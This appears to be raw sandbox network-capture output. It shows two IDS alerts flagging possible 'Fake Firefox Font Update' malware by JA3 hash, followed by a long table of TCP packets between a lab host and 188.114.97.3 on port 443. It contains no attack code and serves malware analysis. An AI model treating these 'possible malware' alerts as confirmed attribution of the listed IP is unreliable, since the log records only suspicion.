                                                                                                                2024-11-14T19:57:46.191474+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749266188.114.97.3443TCP
                                                                                                                2024-11-14T19:57:47.567376+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749267188.114.97.3443TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 14, 2024 19:56:52.451127052 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:52.451169968 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:52.451240063 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:52.452200890 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:52.452220917 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:53.472197056 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:53.472276926 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:53.475033045 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:53.475054979 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:53.475497007 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:53.526913881 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:53.546766996 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:53.546797037 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:53.547085047 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.027669907 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.027879953 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.027944088 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.027966022 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.028054953 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.028150082 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.028166056 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.028175116 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.028234005 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.028251886 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.028714895 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.028945923 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.028954983 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.073771954 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.073792934 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.120660067 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.145452976 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.152539968 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.152595997 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.152622938 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.152986050 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.153038979 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.153048992 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.153417110 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.153462887 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.153471947 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.153578997 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.153620005 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.153626919 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.198781967 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.198807955 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.245675087 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.263020992 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.270703077 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.270778894 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.270797968 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.270828962 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.270881891 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.270915985 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.271174908 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.271225929 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.271239996 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.271357059 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.271511078 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.271521091 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.312803984 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.312868118 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.312903881 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.355042934 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.381135941 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388102055 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388144970 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388144970 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.388170958 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388287067 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388308048 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.388319016 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388396978 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.388566971 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388626099 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.388947964 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.388956070 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.389045000 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.389091969 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.389097929 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.389163017 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.389206886 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.389375925 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.389393091 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.389405012 CET49180443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.389410973 CET44349180188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.427753925 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.427813053 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:54.427936077 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.428442955 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:54.428462029 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:55.316577911 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:55.316792965 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:55.420105934 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:55.420149088 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:55.421125889 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:55.423034906 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:55.423213005 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:55.423226118 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.233901024 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.234438896 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.234652996 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.234652996 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.234652996 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.291671038 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.291723013 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.291783094 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.292073011 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.292083025 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.448808908 CET49191443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.448843002 CET44349191188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.987659931 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.987750053 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.988970041 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.988981962 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.989306927 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:56.990194082 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.990233898 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:56.990236998 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:57.341881037 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:57.342036009 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:57.342159033 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:57.342186928 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:57.342199087 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:57.342206001 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:57.342226982 CET49202443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:57.342230082 CET44349202188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:59.950839996 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:59.950897932 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:56:59.950958014 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:59.951308966 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:56:59.951324940 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.659548044 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.659841061 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.660903931 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.660918951 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.661282063 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.665066957 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.665288925 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.665329933 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.665431023 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.665481091 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.665657997 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.665719032 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.666883945 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.666918993 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:00.666985035 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:00.666996002 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:01.855866909 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:01.856030941 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:01.856108904 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:01.975008011 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:01.975049019 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:01.975069046 CET49218443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:01.975083113 CET44349218188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:02.664189100 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:02.664231062 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:02.664300919 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:02.664613008 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:02.664624929 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.390536070 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.390674114 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:03.391891003 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:03.391900063 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.392220020 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.393069029 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:03.393079996 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:03.393088102 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.946984053 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.947067976 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:03.947124004 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:03.961894035 CET49234443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:03.961908102 CET44349234188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:04.004565001 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:04.004615068 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:04.004671097 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:04.005198002 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:04.005213022 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.079440117 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.079524994 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:05.139669895 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:05.139734983 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.140832901 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.142687082 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:05.142735004 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:05.142754078 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.928406954 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.928574085 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:05.928642035 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:06.180495024 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:06.180535078 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:06.180546999 CET49241443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:06.180555105 CET44349241188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:06.478009939 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:06.478050947 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:06.478111982 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:06.478379011 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:06.478393078 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.345288038 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.345393896 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.346535921 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.346544027 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.346750021 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.347582102 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.347595930 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.347601891 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.871812105 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.871877909 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.872025967 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.872025967 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.872056961 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.872081995 CET49251443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.872088909 CET44349251188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.909244061 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.909282923 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:07.909351110 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.909607887 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:07.909622908 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:08.795089960 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:08.795186996 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:08.848341942 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:08.848377943 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:08.849265099 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:08.850097895 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:08.850300074 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:08.850343943 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:08.850492954 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:08.850545883 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:09.694271088 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:09.694350004 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:09.694416046 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:09.694567919 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:09.694591045 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:09.694606066 CET49258443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:09.694612980 CET44349258188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:09.991045952 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:09.991102934 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:09.991178036 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:09.991554976 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:09.991581917 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.926961899 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.927041054 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.928896904 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.928908110 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.929162979 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.930219889 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.930399895 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.930428982 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.930519104 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.930547953 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.930649042 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.930676937 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:10.930797100 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:10.930813074 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.044434071 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.044507980 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.044694901 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.044694901 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.044738054 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.044760942 CET49263443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.044769049 CET44349263188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.062545061 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.062644958 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.062786102 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.063030958 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.063071966 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.681091070 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.682250977 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.689832926 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.689884901 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.690083981 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:12.690874100 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.690874100 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:12.690916061 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:13.085338116 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:13.085397959 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:13.085488081 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:13.086401939 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:13.086456060 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:13.086486101 CET49264443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:13.086503983 CET44349264188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:43.478476048 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:43.478521109 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:43.478598118 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:43.479680061 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:43.479695082 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:44.180915117 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:44.181061029 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:44.182369947 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:44.182404995 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:44.182642937 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:44.230405092 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:44.233500004 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:44.233556032 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:44.233634949 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.084922075 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.084960938 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.084995031 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.085015059 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.085037947 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.085068941 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.085098982 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.085227013 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.085254908 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.085377932 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.085448027 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.085505009 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.090126038 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.136791945 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.136867046 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.183564901 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.204189062 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.234988928 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.235033989 CET44349265188.114.97.3192.168.2.7
                                                                                                                Nov 14, 2024 19:57:45.235152960 CET49265443192.168.2.7188.114.97.3
                                                                                                                Nov 14, 2024 19:57:45.235239029 CET44349265188.114.97.3192.168.2.7
